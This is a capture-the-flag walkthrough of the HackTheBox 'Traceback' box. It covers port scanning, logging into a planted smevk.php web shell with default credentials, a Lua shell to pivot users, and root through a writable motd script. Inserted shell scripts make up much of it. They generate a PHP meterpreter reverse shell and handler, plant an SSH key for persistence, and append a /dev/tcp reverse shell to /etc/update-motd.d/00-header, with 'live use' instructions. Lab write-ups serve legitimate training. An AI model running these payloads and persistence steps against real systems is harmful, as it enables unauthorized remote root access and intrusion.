1. HackTheBox. Traceback walkthrough. Backdoor, Lua, SSH (difficulty: easy)

14 May 2023 · 4 minutes · Author: Lady Liberty

Learn more about backdoors, Lua and SSH

First, a backdoor: a malicious program, or sometimes a loophole deliberately left in the code of a legitimate program, that gives an outsider access to a system for unauthorized actions. A backdoor is exactly what its name says: it quietly lets an attacker in, with the privileges of the compromised component and often those of an administrator. Backdoors resemble legitimate remote-administration tools, but their functionality is usually broader. Besides controlling processes at the system level and even the BIOS, a backdoor can steal personal data, download and upload files over the network, open the way for viruses and worms, connect to remote hosts, and turn the computer into a "zombie" in a botnet, all without the owner noticing.

Next, Lua and SSH. Lua is a lightweight, multi-paradigm scripting language that is commonly embedded in other programs to implement their business logic; it matters on this box because a Lua script we are allowed to run can call out to the operating system.

SSH is a client-server protocol for authenticating to remote systems and encrypting the traffic exchanged over the remote session. By default the server listens on TCP port 22 (the port can be changed). When a client connects, the two sides negotiate an encrypted channel, the client verifies the server's host key against the entries it has stored in its known_hosts file, the user authenticates with a password or a key, and the server then starts the user's login shell.

Connecting to the lab via VPN: do not connect from a work computer or from a host that holds data you care about, because you are entering a private network shared with people who know a thing or two about IT.

Recon

1. First we scan for open ports. Since a full port scan with nmap takes a long time, I first sweep with masscan: all TCP and UDP ports, from the tun0 interface, at 500 packets per second. The command and its result are shown in Screenshot 1 and Screenshot 2.


Screenshot 1. The masscan command.

Screenshot 2. The masscan result.

2. To get more detail about the services behind the open ports, we run nmap with the -A option (OS detection, version detection, default NSE scripts and traceroute) against the ports masscan found. (Screenshot 3 and Screenshot 4.)


Screenshot 3. The nmap command with the -A option.

Screenshot 4. The nmap result.
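The two-stage scan described in the steps above, as an added example (these are not the author's exact commands): a fast masscan sweep of all TCP and UDP ports, then a targeted nmap -A run restricted to the ports masscan reported open. The interface, target address and rate are assumptions taken from the description of the scan; the sample masscan output is constructed so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example for the Recon steps (not the author's own commands):
# sweep all TCP/UDP ports with masscan, then run the slow nmap -A scan
# only against the ports masscan already found open.
IFACE="tun0"             # assumption: HTB VPN interface
TARGET="10.10.10.181"    # assumption: placeholder box address, substitute yours
RATE=500                 # packets per second, as in the write-up

# Full TCP+UDP sweep. masscan prints one line per finding, e.g.
#   Discovered open port 22/tcp on 10.10.10.181
run_masscan() {
    masscan -e "$IFACE" -p1-65535,U:1-65535 --rate="$RATE" "$1"
}

# Read masscan output on stdin and emit a sorted, de-duplicated,
# comma-separated port list for one protocol ("tcp" or "udp"),
# i.e. the form nmap's -p option expects. Status/noise lines are ignored.
masscan_ports() {
    awk -v proto="$1" '
        $1 == "Discovered" && $2 == "open" && $3 == "port" {
            split($4, pp, "/")
            if (pp[2] == proto) print pp[1]
        }' | sort -n | uniq | paste -s -d ',' -
}

# Service/version/OS scan on the open TCP ports only
# (nmap -A is shorthand for -O -sV -sC --traceroute).
targeted_nmap() {
    ports=$(run_masscan "$1" | tee masscan.out | masscan_ports tcp)
    [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
    nmap -A -p "$ports" "$1"
}

# Constructed sample of masscan output (not real scan data) for an offline run.
SAMPLE_MASSCAN_OUTPUT='Discovered open port 80/tcp on 10.10.10.181
Discovered open port 22/tcp on 10.10.10.181
Discovered open port 80/tcp on 10.10.10.181
Discovered open port 53/udp on 10.10.10.181
rate:  0.50-kpps, 100.00% done, waiting 0-secs, found=4'

# Offline demo: prints "22,80".
printf '%s\n' "$SAMPLE_MASSCAN_OUTPUT" | masscan_ports tcp
# Live use (needs masscan, nmap and the VPN up): targeted_nmap "$TARGET"
```

Feeding masscan's findings into nmap -p keeps the -A run to a few ports instead of 65535, which is the whole point of sweeping with masscan first; the UDP ports can be passed to a separate nmap -sU run the same way.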

3. An SSH service and a web server are running on the host. Opening the web server in a browser shows nothing except a message. (Screenshot 5.)

Screenshot 5. The message on the web page.

4. The page source, however, contains an interesting line. (Screenshot 6.)


Screenshot 6. The interesting line in the page source.

5. Searching for this line on Google leads to a GitHub page. (Screenshot 7 and Screenshot 8.)


Screenshot 7. Google search page.

Screenshot 8. The GitHub page.

Entry Point

1. Going through the files in that repository, we determine that smevk.php was uploaded to the server. (Screenshot 1.) In the original source on GitHub we find the default credentials and log in with them. (Screenshot 2 and Screenshot 3.)

Screenshot 1. The smevk.php login form.

Screenshot 2. Source code on GitHub with the default credentials.

Screenshot 3. The web shell after login.

2. In the next step we generate a PHP reverse shell and start the listener. (Screenshot 4 and Screenshot 5.)

Screenshot 4. Generating the PHP shell.

Screenshot 5. The listener.

3. Now we upload the shell through the web shell and request it in the browser. We get a meterpreter session. (Screenshot 6 and Screenshot 7.)

Screenshot 6. The meterpreter session.

Screenshot 7. Uploading the shell.
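The payload-and-listener part of the Entry Point procedure, as an added example (not the author's own commands): msfvenom builds a PHP meterpreter payload, a matching exploit/multi/handler is started from a generated resource file, and the uploaded file is requested to trigger the connect-back. LHOST, LPORT, the target address and the upload path are assumptions; the listener settings are validated first because a payload baked with a typo in LHOST never calls back and is tedious to debug.

```shell
#!/bin/sh
# Added example for the Entry Point steps (not the author's own commands).
LHOST="10.10.14.5"        # assumption: attacker's tun0 address
LPORT="4444"              # assumption: listener port
TARGET="10.10.10.181"     # assumption: placeholder box address
PAYLOAD="php/meterpreter/reverse_tcp"

# Sanity checks on the listener settings before anything is generated.
valid_ipv4() {
    echo "$1" | awk -F. 'NF==4 { for (i=1;i<=4;i++) if ($i !~ /^[0-9]+$/ || $i>255) exit 1; exit 0 } { exit 1 }'
}
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# msfconsole resource commands for the handler. ExitOnSession false keeps the
# handler alive if the first callback dies, which PHP shells often do, and
# exploit -j runs it as a background job so the console stays usable.
handler_commands() {
    valid_ipv4 "$1" || return 1
    valid_port "$2" || return 1
    printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n' \
        "$PAYLOAD" "$1" "$2"
}

# 1) payload file to upload through the web shell
gen_payload() {
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f raw -o shell.php
}
# 2) listener, driven by the generated resource file
start_handler() {
    handler_commands "$LHOST" "$LPORT" > handler.rc || return 1
    msfconsole -q -r handler.rc
}
# 3) request the uploaded file to trigger the connect-back
trigger() {
    curl -s -o /dev/null "http://$TARGET/shell.php"   # assumption: the upload landed in the web root
}

# Offline demo: print the handler commands that would be written to handler.rc.
handler_commands "$LHOST" "$LPORT"
# Live use: gen_payload && start_handler   (then upload shell.php and run trigger)
```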

USER

1. In the user's home directory we find files and a note about them.

2. We are also allowed to run a Lua script as the sysadmin user. (Screenshot 2.)

Screenshot 2. Running the Lua script.

3. From it we start a shell. (Screenshot 3.) For convenience, we add an SSH key.

Screenshot 3. Creating an SSH key.

4. We connect with the private key and take the user flag. (Screenshot 4.)

Screenshot 4. The user flag.
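The two USER steps above (shell from the Lua script, then an SSH key for sysadmin) as an added example; these are not the author's commands. Lua's standard library exposes os.execute(), which passes its argument to the system shell, so any Lua script we control and may run as another user is a shell as that user. How the script is invoked on the box (the sudo rule and interpreter path) is not shown on the page and is assumed. For the key, sshd with the default StrictModes rejects authorized_keys if ~/.ssh or the file is group- or world-writable, so the helper sets 700/600 explicitly and refuses to add the same key twice. The public key used in the demo is a constructed placeholder, not a real key.

```shell
#!/bin/sh
# Added example for the USER steps (not the author's own commands).

# (1) Lua script that spawns an interactive shell as whoever runs it.
write_lua_shell() {
    cat > "$1" <<'EOF'
-- os.execute() hands its argument to /bin/sh; run as sysadmin, this is a sysadmin shell
os.execute("/bin/bash -i")
EOF
}

# (2) Append a public key to $home/.ssh/authorized_keys with the permissions
# sshd requires. Returns 1 if the line does not look like a public key.
install_authorized_key() {
    home="$1"; pubkey="$2"
    case "$pubkey" in
        ssh-ed25519\ *|ssh-rsa\ *|ecdsa-sha2-*) ;;
        *) echo "not a public key line: $pubkey" >&2; return 1 ;;
    esac
    mkdir -p "$home/.ssh" && chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys" && chmod 600 "$home/.ssh/authorized_keys"
    grep -qxF "$pubkey" "$home/.ssh/authorized_keys" \
        || printf '%s\n' "$pubkey" >> "$home/.ssh/authorized_keys"
}

# Number of keys installed for a home directory (0 if none).
authorized_key_count() {
    if [ -f "$1/.ssh/authorized_keys" ]; then
        grep -c . "$1/.ssh/authorized_keys" || true
    else
        echo 0
    fi
}

# Offline demo in a scratch directory with a constructed (non-functional) key.
DEMO_HOME=$(mktemp -d)
DEMO_KEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedPlaceholderKeyNotReal00000 demo@attacker"
write_lua_shell "$DEMO_HOME/shell.lua"
install_authorized_key "$DEMO_HOME" "$DEMO_KEY"
install_authorized_key "$DEMO_HOME" "$DEMO_KEY"      # second call is a no-op
authorized_key_count "$DEMO_HOME"                     # prints 1
rm -rf "$DEMO_HOME"

# Live flow (assumptions: interpreter path, sudo rule, target address):
#   ssh-keygen -t ed25519 -f ./traceback_key -N ''                        # attacker box
#   install_authorized_key /home/sysadmin "$(cat traceback_key.pub)"      # in the sysadmin shell
#   ssh -i ./traceback_key sysadmin@10.10.10.181
```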

ROOT

1. We run the LinPEAS enumeration script. In its report we find interesting writable files. (Screenshot 1 and Screenshot 2.)

Screenshot 1. An interesting group of writable files.

Screenshot 2. Running the LinPEAS script.

2. The scripts in /etc/update-motd.d are run as root (by pam_motd) on every SSH login, and /etc/update-motd.d/00-header is writable by us. We confirm the execution with pspy: start it, connect over SSH, and the script appears in pspy's output. Then we append a reverse shell to the file. (Screenshot 3 and Screenshot 4.)

Screenshot 3. The file /etc/update-motd.d/00-header.

Screenshot 4. The reverse shell payload.

3. Now we connect over SSH again and receive the reverse connection on our host. (Screenshot 5.)

Screenshot 5. Root access obtained.
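The ROOT procedure above, as an added example (not the author's commands): find which scripts in the motd directory are group- or world-writable, append a reverse shell to one without clobbering it, and, for the defender, run the same listing as an audit. The attacker address and port are assumptions. One caveat a practitioner hits here: the update-motd scripts are /bin/sh scripts, and the /dev/tcp redirection is a bash feature, so the connect-back has to be wrapped in bash -c.

```shell
#!/bin/sh
# Added example for the ROOT steps (not the author's own commands). pam_motd runs
# every executable in /etc/update-motd.d as root on each SSH login, so a script
# there that our user can write is root code execution.
MOTD_DIR="/etc/update-motd.d"
LHOST="10.10.14.5"   # assumption: attacker tun0 address
LPORT="4444"         # assumption: listener port (nc -lvnp 4444 on the attacker box)

# Files in a directory writable by group or others. The attacker reads the
# output as candidates; the defender reads it as findings (expected: empty,
# every script root:root 0755).
loosely_writable_scripts() {
    find "$1" -maxdepth 1 -type f \( -perm -020 -o -perm -002 \) | sort
}

# Payload line. /dev/tcp only exists in bash, hence the bash -c wrapper.
reverse_shell_line() {
    printf "bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'" "$1" "$2"
}

# Append exactly one payload line as the last line, so the original header
# still prints and the login looks normal. Refuses if the payload is already
# present or the file is not writable; keeps a backup for cleanup afterwards.
append_reverse_shell() {
    file="$1"; line=$(reverse_shell_line "$2" "$3")
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    if grep -qF "$line" "$file"; then
        echo "payload already present in $file" >&2; return 1
    fi
    cp "$file" "/tmp/$(basename "$file").bak"
    printf '\n%s\n' "$line" >> "$file"
}

# Offline demo in a scratch directory that mimics the motd layout.
DEMO=$(mktemp -d)
printf '#!/bin/sh\necho "Welcome"\n' > "$DEMO/00-header"
printf '#!/bin/sh\necho "help"\n'    > "$DEMO/10-help-text"
chmod 775 "$DEMO/00-header"      # group-writable, the misconfiguration LinPEAS flagged
chmod 755 "$DEMO/10-help-text"   # correct permissions
loosely_writable_scripts "$DEMO"                     # prints only .../00-header
append_reverse_shell "$DEMO/00-header" "$LHOST" "$LPORT"
tail -n1 "$DEMO/00-header"                           # the payload line
rm -rf "$DEMO" /tmp/00-header.bak

# Live use after starting the listener:
#   loosely_writable_scripts "$MOTD_DIR"
#   append_reverse_shell "$MOTD_DIR/00-header" "$LHOST" "$LPORT"
#   ssh sysadmin@target      # the login runs the script as root and calls back
```

The fix on the defensive side is the same listing with the opposite expectation: nothing under /etc/update-motd.d should be writable by anyone but root, and the directory's contents should be owned root:root.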